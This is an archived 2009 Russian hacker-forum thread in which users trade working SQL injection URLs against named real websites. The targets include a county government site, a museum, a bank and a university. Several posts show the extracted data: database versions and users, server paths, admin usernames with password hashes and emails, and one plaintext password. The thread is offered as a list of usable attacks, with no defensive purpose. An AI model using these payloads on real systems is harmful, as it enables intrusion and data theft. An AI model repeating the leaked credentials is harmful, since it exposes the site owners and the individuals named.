ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8901  
Старый 17.04.2009, 21:50
fox_malder
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
Провел на форуме:
3193846

Репутация: 242
По умолчанию

вот скулины - http://www.paragon.ge/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,CONCAT_WS(0x203A2 0,%20id,name,pass),11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31+from+na_users/*

http://www.paragon.ge/index.php?id=-1+and+0+union+select+1,2,3,4,5,6,7,8,9,table_name, 11,12,13,14,15,16,17,null,19,20,21,22,23,24,25,26, 27,28,29,30,31+from+information_schema.tables+limi t+26,1/*

http://www.paragon.ge/index.php?id=-1+and+0+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0 x20,pass,name),11,12,13,14,15,16,17,null,19,20,21, 22,23,24,25,26,27,28,29,30,31+from+na_users/*
 
Ответить с цитированием

  #8902  
Старый 17.04.2009, 23:25
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Логин:пароль админа. Как его использовать ещё не нашёл
http://www.diversity.ge/rus/news.php?id=130+and+0+union+select+1,2,3,4,5,conca t_ws(0x3a,name,passwd),7,8+from+user+limit+0,1+--+

Доступна information_schema, mysql.user заблокирована.
 
Ответить с цитированием

  #8903  
Старый 17.04.2009, 23:55
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Chris Hewlett - PR and Artist Management>>
Код:
http://www.chrishewlett.com/archive/detail.php?id=-55+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,0--+
4.1.19-standard-log:chrishewlett:chrishewlett@localhost:unknown-freebsd6.0
Код:
http://www.chrishewlett.com/admin/
 
Ответить с цитированием

  #8904  
Старый 18.04.2009, 00:27
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Строительный портал

Цитата:
http://baza.in.ua/topsite/kom.php?id=-44+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32--
Database Version: 4.1.22-log
Database name: baza1_topsite
User name: baza1_topsite@v48632.freefost.com.ua

Выводить из users
 
Ответить с цитированием

  #8905  
Старый 18.04.2009, 00:34
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

geomap.ru
карты городов
pr4 тиц100
Код:
http://geomap.ru/payment?pid=3&cid=25+and+1=0+union+select+concat_ws(0x20,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),2+--+--

geomap_map@localhost geomap_map 5.0.26-lk-log /usr/ /var/lib/mysql/ /tmp pc-linux-gnu
__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 18.04.2009 в 00:43..
 
Ответить с цитированием

  #8906  
Старый 18.04.2009, 00:38
hitt 1g
Новичок
Регистрация: 14.04.2009
Сообщений: 6
Провел на форуме:
71588

Репутация: 44
По умолчанию

Цитата:
http://www.hickman.ne.gov/index.php?pid=164+union+select+1,2,concat_ws(0x3a, username,pass,email),4,5,6,7,8,9+from+Users+limit+ 0,1--
DB Version: 5.0.75-community-log
DB Name: hickmann_hickman
DB User:hickmann_hweb@localhost

Admin data: hickmanadmin:8dbdda48fb8748d6746f1965824e966a:dann is@diodecom.net

Цитата:
http://www.mpm.edu/collections/staff/staff.php?s=-1+union+select+1,2,3,4,concat_ws(0x3a,fname,pword, umail,memlev),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20+from+mpmadmin.tbladmin+limit+0,1--
DB Version: 5.0.67-community-nt
DB Name: mpmstaff
DB User:mpmadmin@localhost

Admin data: Development:nogo:membership@mpm.edu
 
Ответить с цитированием

[-_-]
  #8907  
Старый 18.04.2009, 02:06
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию [-_-]

Закрытое Акционерное Общество Булгар Банк.
Цитата:
http://www.bulgarbank.ru/download.php?file_id=218+and+ascii(substring((sele ct+version()),1,1))=52
Слепая скуля. Если выполняется то начинается закачивание .zip если нет то download.php ))) => 4ая ветка.

Можно проверить существует ли таблица
Цитата:
http://www.bulgarbank.ru/download.php?file_id=218+union+select+1,2+from+qwe rty
Код:
Table 'bulgarbank.qwerty' doesn't exist
Цитата:
http://www.bulgarbank.ru/download.php?file_id=218+union+select+1,2+from+mys ql.user
Код:
Access denied for user 'bulgarbank'@'localhost' to database 'mysql'
Стоит админка CubiQue.Где у неё юзеры в базе или в конфиге хз,писал на мыло саппорту насчет админки они так и не ответили,ну и пох))))

Официальный сайт. Студенческий профком УлГУ
Цитата:
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,c onvert(user()+using+binary),3,4,5,6,7
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,c onvert(database()+using+binary),3,4,5,6,7
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,c onvert(version()+using+binary),3,4,5,6,7
Код:
students@localhost:students:4.1.14
 
Ответить с цитированием

  #8908  
Старый 18.04.2009, 06:12
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.hayonstudio.com/project.php?id=4+and+substr(version(),1,1)=5/*

http://www.shoplifted.co.uk/index.cfm?act=shop&process=full&id=453+and+substr( version(),1,1)=5/*
 
Ответить с цитированием

  #8909  
Старый 18.04.2009, 08:59
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

www.groundworkopensource.com Pr-6
PHP код:
http://www.groundworkopensource.com/products/poll-results.html?poll_id=6+union+select+1,concat_ws(0x3a,user(),user,password,host,file_priv),3+from+mysql.user--+&novote=1 
 
Ответить с цитированием

  #8910  
Старый 18.04.2009, 10:48
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.alsystems.com/newsletter.php?id=-11+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
alsystem_alsyste@localhost:alsystem_alsys:5.0.67-community
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ